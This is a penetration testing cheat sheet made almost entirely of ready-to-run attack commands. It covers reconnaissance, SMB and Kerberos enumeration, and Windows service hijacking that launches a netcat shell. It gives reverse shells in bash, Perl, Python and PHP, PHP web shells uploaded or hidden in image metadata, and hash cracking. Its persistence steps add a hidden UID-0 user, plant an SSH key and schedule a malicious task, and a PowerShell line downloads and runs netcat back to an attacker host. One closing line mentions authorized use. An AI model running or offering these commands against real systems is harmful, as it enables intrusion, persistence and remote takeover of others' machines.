Pentesting Cheat Sheet
Word count 675 | 2025-08-26 22:11:15
Pentesting Cheat Sheet - A Comprehensive Penetration Testing Guide
Reconnaissance
Network scanning and host discovery
- Extract live IPs with open services from NMAP grepable output:
nmap 10.1.1.1 --open -oG scan-results; grep "/open" scan-results | cut -d " " -f 2 > exposed-services-ips
- Simple per-port scan:
for x in 7000 8000 9000; do nmap -Pn --host-timeout 201 --max-retries 0 -p $x 1.1.1.1; done
DNS reconnaissance
whois domain.com
dig {a|txt|ns|mx} domain.com
dig {a|txt|ns|mx} domain.com @ns1.domain.com
host -t {a|txt|ns|mx} megacorpone.com
host -a megacorpone.com
host -l megacorpone.com ns1.megacorpone.com
dnsrecon -d megacorpone.com -t axfr -n ns2.megacorpone.com
dnsenum domain.com
Banner grabbing
nc -v $TARGET 80
telnet $TARGET 80
curl -v http://$TARGET
Service enumeration and vulnerability scanning
NFS share abuse
# List the exports offered by the host
showmount -e 192.168.110.102
# Only effective when the export is writable and exported with no_root_squash; root_squash (the default) neutralises it
chown root:root sid-shell; chmod +s sid-shell
Kerberos user enumeration
nmap $TARGET -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test'
HTTP brute forcing and scanning
target=10.0.0.1; gobuster -u http://$target -r -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt -t 150 -l | tee $target-gobuster
target=10.0.0.1; nikto -h http://$target:80 | tee $target-nikto
target=10.0.0.1; wpscan --url http://$target:80 --enumerate u,t,p | tee $target-wpscan-enum
SMB/RPC enumeration
rpcinfo -p $TARGET
nbtscan $TARGET
smbclient -L //$TARGET -U ""
rpcclient -U "" $TARGET
smbclient -L //$TARGET
enum4linux $TARGET
Privilege escalation
Windows service privilege escalation
- Find services on which Authenticated Users hold SERVICE_ALL_ACCESS:
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
- Modify the service configuration:
sc config [service_name] binpath= "C:\nc.exe 10.11.0.245 443 -e C:\WINDOWS\System32\cmd.exe" obj= "LocalSystem" password= ""
sc qc [service_name]
sc start [service_name]
AlwaysInstallElevated abuse (both keys must be set to 1)
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated & reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Unquoted service path abuse
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
Reverse shells
Bash reverse shell
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Perl reverse shell
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Python reverse shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP reverse shell
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
File upload and bypass techniques
Form upload
curl -X POST -F "file=@/file/location/shell.php" http://$TARGET/upload.php --cookie "cookie"
Upload via the PUT method
curl -X PUT -d '<?php system($_GET["c"]);?>' http://192.168.2.99/shell.php
Injecting PHP code into an image (metadata comment field)
exiv2 -c 'A "<?php system($_REQUEST["cmd"]);?>"!' backdoor.jpeg
exiftool "-comment<=back.php" back.png
.htaccess trick (make Apache execute a non-.php extension as PHP)
AddType application/x-httpd-php .blah
Password cracking
Hydra against web forms
hydra 10.10.10.52 http-post-form -L /usr/share/wordlists/list "/endpoint/login:usernameField=^USER^&passwordField=^PASS^:unsuccessfulMessage" -s PORT -P /usr/share/wordlists/list
HashCat
# Brute force based on a mask pattern (--stdout only prints the candidates)
hashcat -a3 -m0 mantas?d?d?d?u?u?u --force --potfile-disable --stdout
# Generate password candidates: wordlist + mask (hybrid mode), printed only
hashcat -a6 --stdout /usr/share/wordlists/rockyou.txt ?d?d?d?u?u?u --force --potfile-disable
# Run the same hybrid attack against an MD5 hash
hashcat -a6 -m0 "e99a18c428cb38d5f260853678922e03" /usr/share/wordlists/rockyou.txt ?d?d?d?u?u?u --force --potfile-disable
Post-exploitation
Create a hidden root-equivalent user (UID 0)
echo 'spotless::0:0:root:/root:/bin/bash' >> /etc/passwd
Add an SSH key
mkdir /root/.ssh 2>/dev/null; echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQChKCUsFVWj1Nz8SiM01Zw/BOWcMNs2Zwz3MdT7leLU9/Un4mZ7vjco0ctsyh2swjphWr5WZG28BN90+tkyj3su23UzrlgEu3SaOjVgxhkx/Pnbvuua9Qs9gWbWyRxexaC1eDb0pKXHH2Msx+GlyjfDOngq8tR6tkU8u1S4lXKLejaptiz0q6P0CcR6hD42IYkqyuWTNrFdSGLtiPCBDZMZ/5g1cJsyR59n54IpV0b2muE3F7+NPQmLx57IxoPjYPNUbC6RPh/Saf7o/552iOcmVCdLQDR/9I+jdZIgrOpstqSiJooU9+JImlUtAkFxZ9SHvtRbFt47iH7Sh7LiefP5 root@kali' >> /root/.ssh/authorized_keys
Windows scheduled task
schtasks /create /sc minute /mo 10 /tn "TaskName" /tr C:\Windows\system32\evil.exe
File transfer
TFTP
# Start TFTP on Linux
service atftpd start
# Fetch the file on Windows
tftp -i $ATTACKER get /download/location/file /save/location/file
FTP
# Start FTP on Linux
twistd -n ftp -p 21 -r /file/to/serve
# Non-interactive FTP on Windows
(echo open 10.11.0.245&echo anonymous&echo whatever&echo binary&echo get nc.exe&echo bye) > ftp.txt & ftp -s:ftp.txt & nc.exe 10.11.0.245 443 -e cmd
PowerShell download
powershell -Command "& {(New-Object System.Net.WebClient).DownloadFile('http://$ATTACKER/nc.exe','nc.exe'); cmd /c nc.exe $ATTACKER 4444 -e cmd.exe}"
Port forwarding and tunneling
SSH local port forwarding
ssh -L 127.0.0.1:8080:REMOTE_HOST:PORT user@SSH_SERVER
SSH dynamic port forwarding (SOCKS proxy)
ssh -D 127.0.0.1:8080 user@SSH_SERVER
SSH remote port forwarding
ssh -R 5555:LOCAL_HOST:3389 user@SSH_SERVER
HTTP tunnel (httptunnel)
# Server side
hts -F localhost:22 80
# Client side
htc -F 8080 192.168.1.15:80
Miscellaneous tricks
Breaking out of a restricted shell
python -c 'import pty; pty.spawn("/bin/sh")'
/bin/busybox sh
Python code execution
__import__('os').system('id')
Bad-character list generation (\x01 through \xff)
# Python
''.join("\\x{:02x}".format(i) for i in range(1, 256))
# Bash
for i in {1..255}; do printf "\\\x%02x" $i; done; echo -e "\r"
File search tips
# Quickly locate a file by name
locate passwd
# Find the paths of useful executables
which nc wget curl php perl python netcat tftp telnet ftp
# Recursively find .conf files
find /etc -iname '*.conf'
Summary
This cheat sheet covers the full penetration testing lifecycle, from initial reconnaissance through privilege escalation to post-exploitation. Key points include:
- Comprehensive network and service enumeration techniques
- Several reverse shell methods suited to different environments
- File upload and filter bypass tricks
- Password cracking and hash attacks
- Privilege escalation methods for Windows and Linux systems
- Post-exploitation persistence techniques
- File transfer and data exfiltration methods
- Port forwarding and tunneling techniques
These techniques should only be used in authorized testing and in compliance with applicable laws and regulations.